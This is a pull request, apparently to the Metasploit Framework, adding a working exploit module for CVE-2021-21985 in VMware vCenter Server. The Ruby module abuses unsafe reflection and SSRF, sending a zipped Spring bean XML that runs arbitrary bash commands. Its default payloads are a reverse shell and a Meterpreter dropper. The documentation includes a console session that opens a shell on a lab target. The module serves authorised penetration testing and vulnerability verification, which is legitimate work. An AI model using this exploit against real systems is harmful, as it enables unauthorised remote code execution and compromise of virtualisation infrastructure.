### PR TITLE
Add VMware vCenter Server CVE-2021-21985 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md
@@ -1,0 +1,90 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits Java unsafe reflection and SSRF in the VMware
+vCenter Server Virtual SAN Health Check plugin's `ProxygenController`
+class to execute code as the `vsphere-ui` user.
+
+See the [vendor advisory] for affected and patched versions. Tested
+against **VMware vCenter Server 6.7 Update 3m (Linux appliance)**.
+
+[vendor advisory]: https://www.vmware.com/security/advisories/VMSA-2021-0010.html
+
+### Setup
+
+Follow [VMware's official documentation] or the unorthodox steps below.
+
+1. Download ISO
+2. Extract OVA from ISO
+3. Import OVA
+4. Boot VM
+5. Set root password in console
+6. Complete setup at <https://change-this-to-your-target-host:5480/>
+7. **(Optional)** Upgrade to desired patch level
+
+Initialization may take a while before the target is exploitable.
+
+[VMware's official documentation]: https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-8DC3866D-5087-40A2-8067-1361A2AF95BD.html
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### VMware vCenter Server 6.7 Update 3m (Linux appliance)
+
+```
+msf6 > use exploit/linux/http/vmware_vcenter_vsan_health_rce
+[*] Using configured payload cmd/unix/reverse_python_ssl
+msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) > options
+
+Module options (exploit/linux/http/vmware_vcenter_vsan_health_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) > set rhosts 172.16.57.2
+rhosts => 172.16.57.2
+msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) > set lhost 172.16.57.1
+lhost => 172.16.57.1
+msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) > run
+
+[*] Started reverse SSL handler on 172.16.57.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System property user.name is vsphere-ui.
+[*] Executing cmd/unix/reverse_python_ssl (Unix Command)
+[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.2:57878) at 2021-07-08 17:25:09 -0500
+
+id
+uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
+uname -a
+Linux photon-machine 4.4.250-1.ph1 #1-photon SMP Fri Jan 15 03:01:15 UTC 2021 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/vmware_vcenter_vsan_health_rce.rb
+++ b/modules/exploits/linux/http/vmware_vcenter_vsan_health_rce.rb
@@ -1,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',
+        'Description' => %q{
+          This module exploits Java unsafe reflection and SSRF in the VMware
+          vCenter Server Virtual SAN Health Check plugin's ProxygenController
+          class to execute code as the vsphere-ui user.
+
+          See the vendor advisory for affected and patched versions. Tested
+          against VMware vCenter Server 6.7 Update 3m (Linux appliance).
+        },
+        'Author' => [
+          'Ricter Z', # Discovery and PoC used
+          'wvu' # Analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2021-21985'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],
+          ['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],
+          ['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],
+          # Other great writeups!
+          ['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],
+          ['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],
+          ['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],
+          ['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']
+        ],
+        'DisclosureDate' => '2021-05-25',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky
+          'SideEffects' => [
+            IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log
+            ARTIFACTS_ON_DISK # CmdStager
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    # https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path,
+        '/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'
+      ),
+      'ctype' => 'application/json',
+      'data' => {
+        'methodInput' => ['user.name', nil]
+      }.to_json
+    )
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable('System property user.name is vsphere-ui.')
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status(cmd)
+
+    url = OfflineBundle.new(cmd).to_url
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path,
+        '/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'
+      ),
+      'ctype' => 'application/json',
+      'data' => {
+        'methodInput' => [
+          ["https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}"]
+        ]
+      }.to_json
+    )
+
+    fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200
+  end
+
+  class OfflineBundle
+    attr_accessor :cmd
+
+    def initialize(cmd)
+      @cmd = cmd
+    end
+
+    def to_xml
+      bean = Rex::Text.rand_text_alpha_lower(8..16)
+      prop = Rex::Text.rand_text_alpha_lower(8..16)
+
+      # https://www.tutorialspoint.com/spring/spring_bean_definition.htm
+      <<~XML
+        <beans>
+          <bean id="#{bean}" class="java.lang.ProcessBuilder">
+            <constructor-arg>
+              <list>
+                <value>/bin/bash</value>
+                <value>-c</value>
+                <value><![CDATA[#{cmd}]]></value>
+              </list>
+            </constructor-arg>
+            <property name="#{prop}" value="\#{#{bean}.start()}"/>
+          </bean>
+        </beans>
+      XML
+    end
+
+    def to_zip
+      Msf::Util::EXE.to_zip([
+        fname: 'offline_bundle.xml',
+        data: to_xml.gsub(/^\s+/, '').tr("\n", '')
+      ])
+    end
+
+    def to_url
+      # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs
+      "data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}"
+    end
+  end
+
+end


### PR DESCRIPTION
```
msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) > info

       Name: VMware vCenter Server Virtual SAN Health Check Plugin RCE
     Module: exploit/linux/http/vmware_vcenter_vsan_health_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-05-25

Provided by:
  Ricter Z
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits Java unsafe reflection and SSRF in the VMware
  vCenter Server Virtual SAN Health Check plugin's ProxygenController
  class to execute code as the vsphere-ui user. See the vendor
  advisory for affected and patched versions. Tested against VMware
  vCenter Server 6.7 Update 3m (Linux appliance).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21985
  https://www.vmware.com/security/advisories/VMSA-2021-0010.html
  https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis
  http://noahblog.360.cn/vcenter-cve-2021-2021-21985/
  https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/
  https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5
  https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/
  https://github.com/alt3kx/CVE-2021-21985_PoC

msf6 exploit(linux/http/vmware_vcenter_vsan_health_rce) >
```